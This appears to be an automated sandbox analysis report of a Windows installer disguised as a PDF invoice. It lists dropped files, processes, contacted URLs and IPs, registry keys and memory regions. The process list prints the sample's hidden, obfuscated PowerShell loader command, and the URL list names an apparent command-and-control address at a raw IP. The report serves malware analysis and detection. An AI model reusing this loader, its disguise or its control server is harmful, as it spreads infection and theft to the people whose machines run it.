Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\twinsomeness\Pissoirers\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\twinsomeness\Pissoirers\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\twinsomeness\Pissoirers\Spirochete204.Myc
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ttdd45s.dxf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n0fvh05u.yf0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\twinsomeness\Chamorro.Saf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\twinsomeness\Pissoirers\Peripatecically200.par
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\twinsomeness\Pissoirers\blokkryptografimetoderne.une
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\twinsomeness\Pissoirers\bundgrnsens.tan
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\twinsomeness\Pissoirers\handelskamrene.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\twinsomeness\Pissoirers\huse.got
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\twinsomeness\Pissoirers\rognfiskenes.sid
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\188E93\31437F.lck
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\eb42b1a5c308fc11edf1ddbdd25c8486_9e146be9-c76a-4720-bcdb-53011b87bd06
|
data
|
dropped
|
||
|
C:\Users\user\Music\veterinarians.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun
Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
|
dropped
|
There are 7 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe
|
"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$unterraced=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Pissoirers\Spirochete204.Myc';$Lagerekspedient=$unterraced.SubString(66375,3);.$Lagerekspedient($unterraced)"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://45.61.136.239/index.php/54596186971079
|
45.61.136.239
|
|
|
|
https://www.google.com
|
unknown
|
||
|
http://45.61.136.239/index.php/54596186971079qc
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.microsoft.coL
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 9 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
142.250.186.110
|
||
|
drive.usercontent.google.com
|
142.250.185.193
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
45.61.136.239
|
unknown
|
United States
|
|
|
|
142.250.185.193
|
drive.usercontent.google.com
|
United States
|
||
|
142.250.186.110
|
drive.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\Pauropod\wohlerite
|
Gigelira57
|
||
|
HKEY_CURRENT_USER\varmefordelingers\Uninstall\bilder
|
echinite
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
9A72000
|
direct allocation
|
page execute and read and write
|
|
|
|
59D5000
|
heap
|
page read and write
|
|
|
|
30F2000
|
remote allocation
|
page execute and read and write
|
|
|
|
2114D000
|
stack
|
page read and write
|
||
|
788000
|
unkown
|
page read and write
|
||
|
88C0000
|
trusted library allocation
|
page read and write
|
||
|
8A10000
|
heap
|
page read and write
|
||
|
3569000
|
heap
|
page read and write
|
||
|
5AA0000
|
direct allocation
|
page read and write
|
||
|
536E000
|
stack
|
page read and write
|
||
|
98C0000
|
direct allocation
|
page execute and read and write
|
||
|
34A4000
|
trusted library allocation
|
page read and write
|
||
|
76A0000
|
heap
|
page read and write
|
||
|
8E9E000
|
stack
|
page read and write
|
||
|
211CF000
|
stack
|
page read and write
|
||
|
5835000
|
heap
|
page read and write
|
||
|
5AB0000
|
direct allocation
|
page read and write
|
||
|
8A8C000
|
heap
|
page read and write
|
||
|
75E0000
|
direct allocation
|
page read and write
|
||
|
8980000
|
trusted library allocation
|
page read and write
|
||
|
7DD000
|
unkown
|
page readonly
|
||
|
8897000
|
stack
|
page read and write
|
||
|
546E000
|
stack
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
8C55000
|
trusted library allocation
|
page read and write
|
||
|
2E90000
|
direct allocation
|
page read and write
|
||
|
9E7000
|
heap
|
page read and write
|
||
|
786000
|
unkown
|
page read and write
|
||
|
E01000
|
unkown
|
page execute read
|
||
|
5830000
|
heap
|
page read and write
|
||
|
6667000
|
trusted library allocation
|
page read and write
|
||
|
21040000
|
remote allocation
|
page read and write
|
||
|
8AAF000
|
heap
|
page read and write
|
||
|
2590000
|
heap
|
page read and write
|
||
|
35E0000
|
heap
|
page read and write
|
||
|
5A43000
|
heap
|
page read and write
|
||
|
5700000
|
heap
|
page read and write
|
||
|
2FFC000
|
stack
|
page read and write
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
7DD000
|
unkown
|
page readonly
|
||
|
89C0000
|
trusted library allocation
|
page read and write
|
||
|
34D0000
|
trusted library allocation
|
page read and write
|
||
|
89B0000
|
trusted library allocation
|
page read and write
|
||
|
5A58000
|
trusted library allocation
|
page read and write
|
||
|
7E70000
|
trusted library allocation
|
page read and write
|
||
|
2107E000
|
stack
|
page read and write
|
||
|
5A44000
|
heap
|
page read and write
|
||
|
5A44000
|
heap
|
page read and write
|
||
|
34D2000
|
trusted library allocation
|
page read and write
|
||
|
898D000
|
trusted library allocation
|
page read and write
|
||
|
7A9000
|
unkown
|
page read and write
|
||
|
7C1D000
|
heap
|
page read and write
|
||
|
7F0B000
|
stack
|
page read and write
|
||
|
64C9000
|
trusted library allocation
|
page read and write
|
||
|
364B000
|
heap
|
page read and write
|
||
|
8F30000
|
heap
|
page read and write
|
||
|
CEF000
|
stack
|
page read and write
|
||
|
75B0000
|
direct allocation
|
page read and write
|
||
|
7D7F000
|
stack
|
page read and write
|
||
|
7580000
|
direct allocation
|
page read and write
|
||
|
2E95000
|
direct allocation
|
page read and write
|
||
|
5980000
|
direct allocation
|
page read and write
|
||
|
8DDC000
|
stack
|
page read and write
|
||
|
34A0000
|
trusted library allocation
|
page read and write
|
||
|
7550000
|
direct allocation
|
page read and write
|
||
|
7E60000
|
trusted library allocation
|
page read and write
|
||
|
354E000
|
stack
|
page read and write
|
||
|
8A25000
|
heap
|
page read and write
|
||
|
79FE000
|
stack
|
page read and write
|
||
|
7A6000
|
unkown
|
page read and write
|
||
|
7A32000
|
heap
|
page read and write
|
||
|
4F8E000
|
stack
|
page read and write
|
||
|
20E1F000
|
stack
|
page read and write
|
||
|
34B9000
|
trusted library allocation
|
page read and write
|
||
|
4FA0000
|
heap
|
page read and write
|
||
|
5A07000
|
heap
|
page read and write
|
||
|
54AF000
|
stack
|
page read and write
|
||
|
2118E000
|
stack
|
page read and write
|
||
|
21040000
|
remote allocation
|
page read and write
|
||
|
7C30000
|
trusted library allocation
|
page read and write
|
||
|
8E5E000
|
stack
|
page read and write
|
||
|
3406000
|
heap
|
page read and write
|
||
|
8F50000
|
trusted library allocation
|
page execute and read and write
|
||
|
5960000
|
direct allocation
|
page read and write
|
||
|
6EE26000
|
unkown
|
page readonly
|
||
|
7B3000
|
unkown
|
page read and write
|
||
|
4F40000
|
heap
|
page execute and read and write
|
||
|
7BA2000
|
heap
|
page read and write
|
||
|
21040000
|
remote allocation
|
page read and write
|
||
|
960000
|
heap
|
page read and write
|
||
|
5A4A000
|
heap
|
page read and write
|
||
|
542E000
|
stack
|
page read and write
|
||
|
5A4C000
|
heap
|
page read and write
|
||
|
59F0000
|
heap
|
page read and write
|
||
|
A472000
|
direct allocation
|
page execute and read and write
|
||
|
5A00000
|
heap
|
page read and write
|
||
|
5617000
|
trusted library allocation
|
page read and write
|
||
|
6653000
|
trusted library allocation
|
page read and write
|
||
|
79BE000
|
stack
|
page read and write
|
||
|
5B4E000
|
stack
|
page read and write
|
||
|
20F3F000
|
stack
|
page read and write
|
||
|
E00000
|
unkown
|
page readonly
|
||
|
408000
|
unkown
|
page readonly
|
||
|
81D000
|
unkown
|
page readonly
|
||
|
64C1000
|
trusted library allocation
|
page read and write
|
||
|
53EE000
|
stack
|
page read and write
|
||
|
E07000
|
unkown
|
page readonly
|
||
|
7E40000
|
trusted library allocation
|
page read and write
|
||
|
5A07000
|
heap
|
page read and write
|
||
|
7B49000
|
heap
|
page read and write
|
||
|
2570000
|
heap
|
page read and write
|
||
|
7B59000
|
heap
|
page read and write
|
||
|
8F70000
|
direct allocation
|
page execute and read and write
|
||
|
7590000
|
direct allocation
|
page read and write
|
||
|
9B8000
|
heap
|
page read and write
|
||
|
7BCA000
|
heap
|
page read and write
|
||
|
7DA000
|
unkown
|
page read and write
|
||
|
8AC6000
|
heap
|
page read and write
|
||
|
7C60000
|
trusted library allocation
|
page execute and read and write
|
||
|
7BFC000
|
heap
|
page read and write
|
||
|
8ADA000
|
heap
|
page read and write
|
||
|
4F45000
|
heap
|
page execute and read and write
|
||
|
9EB000
|
heap
|
page read and write
|
||
|
E05000
|
unkown
|
page readonly
|
||
|
35E8000
|
heap
|
page read and write
|
||
|
BAF000
|
stack
|
page read and write
|
||
|
8A20000
|
heap
|
page read and write
|
||
|
7D3E000
|
stack
|
page read and write
|
||
|
6EE2D000
|
unkown
|
page read and write
|
||
|
7DBE000
|
stack
|
page read and write
|
||
|
8F40000
|
trusted library allocation
|
page read and write
|
||
|
7C14000
|
heap
|
page read and write
|
||
|
210BF000
|
stack
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
2F40000
|
remote allocation
|
page execute and read and write
|
||
|
7C50000
|
trusted library allocation
|
page read and write
|
||
|
5A40000
|
heap
|
page read and write
|
||
|
7CE0000
|
trusted library allocation
|
page read and write
|
||
|
4F00000
|
trusted library allocation
|
page read and write
|
||
|
34B0000
|
trusted library allocation
|
page read and write
|
||
|
5910000
|
heap
|
page readonly
|
||
|
401000
|
unkown
|
page execute read
|
||
|
7E20000
|
trusted library allocation
|
page read and write
|
||
|
3237000
|
stack
|
page read and write
|
||
|
5970000
|
direct allocation
|
page read and write
|
||
|
344F000
|
stack
|
page read and write
|
||
|
3270000
|
heap
|
page read and write
|
||
|
2574000
|
heap
|
page read and write
|
||
|
5A00000
|
heap
|
page read and write
|
||
|
6EE2F000
|
unkown
|
page readonly
|
||
|
54C1000
|
trusted library allocation
|
page read and write
|
||
|
AE72000
|
direct allocation
|
page execute and read and write
|
||
|
5BCD000
|
stack
|
page read and write
|
||
|
7CA0000
|
trusted library allocation
|
page read and write
|
||
|
75D0000
|
direct allocation
|
page read and write
|
||
|
26D0000
|
heap
|
page read and write
|
||
|
5950000
|
direct allocation
|
page read and write
|
||
|
81D000
|
unkown
|
page readonly
|
||
|
7530000
|
direct allocation
|
page read and write
|
||
|
7E50000
|
trusted library allocation
|
page read and write
|
||
|
7CD0000
|
trusted library allocation
|
page read and write
|
||
|
2B5E000
|
stack
|
page read and write
|
||
|
2110C000
|
stack
|
page read and write
|
||
|
5A4A000
|
heap
|
page read and write
|
||
|
88B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20FDE000
|
stack
|
page read and write
|
||
|
3508000
|
heap
|
page read and write
|
||
|
5A90000
|
direct allocation
|
page read and write
|
||
|
7E10000
|
trusted library allocation
|
page read and write
|
||
|
5920000
|
direct allocation
|
page read and write
|
||
|
B872000
|
direct allocation
|
page execute and read and write
|
||
|
7690000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
551E000
|
trusted library allocation
|
page read and write
|
||
|
89A0000
|
trusted library allocation
|
page read and write
|
||
|
20F40000
|
heap
|
page read and write
|
||
|
5940000
|
direct allocation
|
page read and write
|
||
|
7560000
|
direct allocation
|
page read and write
|
||
|
35D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
95E000
|
stack
|
page read and write
|
||
|
8A00000
|
trusted library allocation
|
page read and write
|
||
|
BEE000
|
stack
|
page read and write
|
||
|
5AD0000
|
direct allocation
|
page read and write
|
||
|
7C90000
|
trusted library allocation
|
page read and write
|
||
|
966000
|
heap
|
page read and write
|
||
|
7C1A000
|
heap
|
page read and write
|
||
|
8990000
|
trusted library allocation
|
page execute and read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
E1D000
|
unkown
|
page readonly
|
||
|
3618000
|
heap
|
page read and write
|
||
|
5990000
|
heap
|
page read and write
|
||
|
7E80000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
7B40000
|
heap
|
page read and write
|
||
|
8EDE000
|
stack
|
page read and write
|
||
|
7EC0000
|
trusted library allocation
|
page read and write
|
||
|
7B30000
|
heap
|
page read and write
|
||
|
5A44000
|
heap
|
page read and write
|
||
|
8CB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7AD000
|
unkown
|
page read and write
|
||
|
75C0000
|
direct allocation
|
page read and write
|
||
|
64E9000
|
trusted library allocation
|
page read and write
|
||
|
7520000
|
direct allocation
|
page read and write
|
||
|
360C000
|
heap
|
page read and write
|
||
|
75A0000
|
direct allocation
|
page read and write
|
||
|
7540000
|
direct allocation
|
page read and write
|
||
|
8A9B000
|
heap
|
page read and write
|
||
|
5BE0000
|
heap
|
page read and write
|
||
|
4EBC000
|
stack
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
44F2000
|
remote allocation
|
page execute and read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
2B1F000
|
stack
|
page read and write
|
||
|
20EFE000
|
stack
|
page read and write
|
||
|
7B6D000
|
heap
|
page read and write
|
||
|
7CF0000
|
heap
|
page execute and read and write
|
||
|
7CB0000
|
trusted library allocation
|
page read and write
|
||
|
2E90000
|
direct allocation
|
page read and write
|
||
|
2490000
|
heap
|
page read and write
|
||
|
7EA0000
|
trusted library allocation
|
page read and write
|
||
|
782000
|
unkown
|
page read and write
|
||
|
A34000
|
heap
|
page read and write
|
||
|
2C5F000
|
stack
|
page read and write
|
||
|
8AD2000
|
heap
|
page read and write
|
||
|
34D5000
|
trusted library allocation
|
page execute and read and write
|
||
|
24EE000
|
stack
|
page read and write
|
||
|
9F7000
|
heap
|
page read and write
|
||
|
4EF2000
|
remote allocation
|
page execute and read and write
|
||
|
33CE000
|
stack
|
page read and write
|
||
|
5A04000
|
heap
|
page read and write
|
||
|
77C000
|
unkown
|
page read and write
|
||
|
5930000
|
direct allocation
|
page read and write
|
||
|
7BFE000
|
heap
|
page read and write
|
||
|
7DFD000
|
stack
|
page read and write
|
||
|
532F000
|
stack
|
page read and write
|
||
|
7C37000
|
trusted library allocation
|
page read and write
|
||
|
34AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7CC0000
|
trusted library allocation
|
page read and write
|
||
|
6528000
|
trusted library allocation
|
page read and write
|
||
|
53AE000
|
stack
|
page read and write
|
||
|
666C000
|
trusted library allocation
|
page read and write
|
||
|
7E90000
|
trusted library allocation
|
page read and write
|
||
|
970000
|
heap
|
page read and write
|
||
|
3490000
|
trusted library allocation
|
page read and write
|
||
|
8F60000
|
trusted library allocation
|
page read and write
|
||
|
2595000
|
heap
|
page read and write
|
||
|
5B8F000
|
stack
|
page read and write
|
||
|
7E00000
|
trusted library allocation
|
page read and write
|
||
|
33D0000
|
heap
|
page read and write
|
||
|
8A30000
|
heap
|
page read and write
|
||
|
8F20000
|
trusted library allocation
|
page read and write
|
||
|
34C0000
|
trusted library allocation
|
page read and write
|
||
|
20E5D000
|
stack
|
page read and write
|
||
|
3550000
|
heap
|
page readonly
|
||
|
54B0000
|
heap
|
page execute and read and write
|
||
|
36B0000
|
heap
|
page read and write
|
||
|
8A71000
|
heap
|
page read and write
|
||
|
7CA4000
|
trusted library allocation
|
page read and write
|
||
|
34CA000
|
trusted library allocation
|
page execute and read and write
|
||
|
892D000
|
stack
|
page read and write
|
||
|
5998000
|
heap
|
page read and write
|
||
|
7510000
|
direct allocation
|
page read and write
|
||
|
8A7D000
|
heap
|
page read and write
|
||
|
896E000
|
stack
|
page read and write
|
||
|
3470000
|
trusted library section
|
page read and write
|
||
|
7BB8000
|
heap
|
page read and write
|
||
|
5A5E000
|
trusted library allocation
|
page read and write
|
||
|
8F1C000
|
stack
|
page read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
88A0000
|
heap
|
page read and write
|
||
|
5A44000
|
heap
|
page read and write
|
||
|
4EFE000
|
stack
|
page read and write
|
||
|
5820000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
7A4000
|
unkown
|
page read and write
|
||
|
269F000
|
stack
|
page read and write
|
||
|
6EE10000
|
unkown
|
page readonly
|
||
|
5A07000
|
heap
|
page read and write
|
||
|
7EB0000
|
trusted library allocation
|
page read and write
|
||
|
20E9C000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
253E000
|
stack
|
page read and write
|
||
|
6EE11000
|
unkown
|
page execute read
|
||
|
8E1C000
|
stack
|
page read and write
|
||
|
4FA7000
|
heap
|
page read and write
|
||
|
3560000
|
heap
|
page read and write
|
||
|
3641000
|
heap
|
page read and write
|
||
|
35AF000
|
stack
|
page read and write
|
||
|
3480000
|
trusted library section
|
page read and write
|
||
|
3450000
|
heap
|
page read and write
|
||
|
3AF2000
|
remote allocation
|
page execute and read and write
|
||
|
34A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
3500000
|
heap
|
page read and write
|
||
|
34F0000
|
trusted library allocation
|
page read and write
|
||
|
7570000
|
direct allocation
|
page read and write
|
||
|
9FD000
|
heap
|
page read and write
|
||
|
59F9000
|
heap
|
page read and write
|
||
|
5AC0000
|
direct allocation
|
page read and write
|
||
|
7E30000
|
trusted library allocation
|
page read and write
|
||
|
20F9D000
|
stack
|
page read and write
|
||
|
840000
|
heap
|
page read and write
|
||
|
7FD60000
|
trusted library allocation
|
page execute and read and write
|
||
|
5A40000
|
heap
|
page read and write
|
||
|
35B8000
|
trusted library allocation
|
page read and write
|
||
|
8970000
|
heap
|
page read and write
|
There are 296 hidden memdumps, click here to show them.